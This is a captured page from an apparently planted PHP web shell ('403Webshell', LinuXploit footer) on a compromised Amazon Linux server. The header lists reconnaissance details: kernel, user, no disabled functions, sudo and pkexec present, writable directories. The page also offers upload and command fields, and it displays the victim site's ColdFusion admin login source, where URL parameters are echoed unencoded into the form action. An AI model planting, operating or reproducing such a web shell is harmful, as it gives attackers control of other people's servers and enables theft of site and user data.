403Webshell
Server IP : 172.67.201.108  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/cgny/public_html/newadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/cgny/public_html/newadmin/login.cfm
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<link rel="icon" type="image/png" sizes="16x16" href="../plugins/images/favicon.png">
<title>CG Admin</title>
<!-- Bootstrap Core CSS -->
<link href="bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- animation CSS -->
<link href="css/animate.css" rel="stylesheet">
<!-- Custom CSS -->
<link href="css/style.css" rel="stylesheet">
<!-- color CSS -->
<link href="css/colors/default.css" id="theme"  rel="stylesheet">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
<style type="text/css">

	.btn-info,.btn-info:hover, .btn-info.disabled:hover, .btn-info:focus, .btn-info.disabled:focus, .btn-info.focus, .btn-info.disabled.focus {
    background: #5d32b2;
    opacity: .8;
    border: 1px solid #5d32b2; }

.login-register {
    background: url('https://newimages.bwwstatic.com/2017/blackback.jpg') no-repeat center center / cover !important;
    height: 100%;
    position: fixed;
}
   </style>

</head>
<body>
<!-- Preloader -->

<cfcookie name="email" value=" " expires="NOW">
<cfcookie name="email" value=" " expires="NOW" domain="www.cityguideny.com">


<cfset Session.email = -1>
<cfset loggedin = 0>
<cfset temp = StructDelete(session,"id")>
<cfset structClear( session ) />

<section id="wrapper" class="login-register">
  <div class="login-box">
    <div class="white-box">
	    <center>
	    CITYGUIDE
 <cfoutput>     <form class="form-horizontal form-material" id="loginform" action="login2.cfm<cfif parameterexists(url.thanks)>?thanks=on</cfif><Cfif parameterexists(url.refer)>?refer=#url.refer#</Cfif><Cfif parameterexists(url.id)>&id=#url.id#</Cfif><Cfif parameterexists(url.eventid)>&eventid=#url.eventid#</Cfif>" method="post"></cfoutput>
        <h3 class="box-title m-b-20">Sign In</h3>

        <cfif parameterexists(url.thanks)>
	        <b style="color:red;">Thank you for registering, you may now log in to complete your vendor setup!</b><Br><br></cfif>

        <div class="form-group ">
          <div class="col-xs-12">
	          <input name="login" type="hidden" value="on">

            <input name="email" class="form-control" type="text" required="" placeholder="email">
          </div>
        </div>
        <div class="form-group">
          <div class="col-xs-12">
            <input name="password" class="form-control" type="password" required="" placeholder="Password">
          </div>
        </div>
        <div class="form-group">
          <div class="col-md-12">
            <div class="checkbox checkbox-primary pull-left p-t-0">
              <input id="checkbox-signup" type="checkbox">
              <label for="checkbox-signup"> Remember me </label>
            </div>
            <a href="javascript:void(0)" id="to-recover" class="text-dark pull-right"><i class="fa fa-lock m-r-5"></i> Forgot pwd?</a> </div>
        </div>
        <div class="form-group text-center m-t-20">
          <div class="col-xs-12">
            <button class="btn btn-info btn-lg btn-block text-uppercase waves-effect waves-light" type="submit">Log In</button>
          </div>
        </div>

        <div class="form-group m-b-0">
          <div class="col-sm-12 text-center">
<!---            <p>Don't have an account? <a href="register.cfm" class="text-primary m-l-5"><b>Sign Up</b></a></p>
  --->        </div>
        </div>
      </form>
      <form class="form-horizontal" id="recoverform" action="forget.cfm" method="post">
        <div class="form-group ">
          <div class="col-xs-12">
            <h3>Recover Password</h3>
            <p class="text-muted">Enter your Email and instructions will be sent to you! </p>
          </div>
        </div>
        <div class="form-group ">
          <div class="col-xs-12">
            <input name="email" class="form-control" type="text" required="" placeholder="Email">
          </div>
        </div>
        <div class="form-group text-center m-t-20">
          <div class="col-xs-12">
            <button class="btn btn-primary btn-lg btn-block text-uppercase waves-effect waves-light" type="submit">Send PW</button>
          </div>
        </div>
      </form>
    </div>
  </div>
</section>
<!-- jQuery -->
<script src="../plugins/bower_components/jquery/dist/jquery.min.js"></script>
<!-- Bootstrap Core JavaScript -->
<script src="bootstrap/dist/js/bootstrap.min.js"></script>
<!-- Menu Plugin JavaScript -->
<script src="../plugins/bower_components/sidebar-nav/dist/sidebar-nav.min.js"></script>

<!--slimscroll JavaScript -->
<script src="js/jquery.slimscroll.js"></script>
<!--Wave Effects -->
<script src="js/waves.js"></script>
<!-- Custom Theme JavaScript -->
<script src="js/custom.min.js"></script>
<!--Style Switcher -->
<script src="../plugins/bower_components/styleswitcher/jQuery.style.switcher.js"></script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit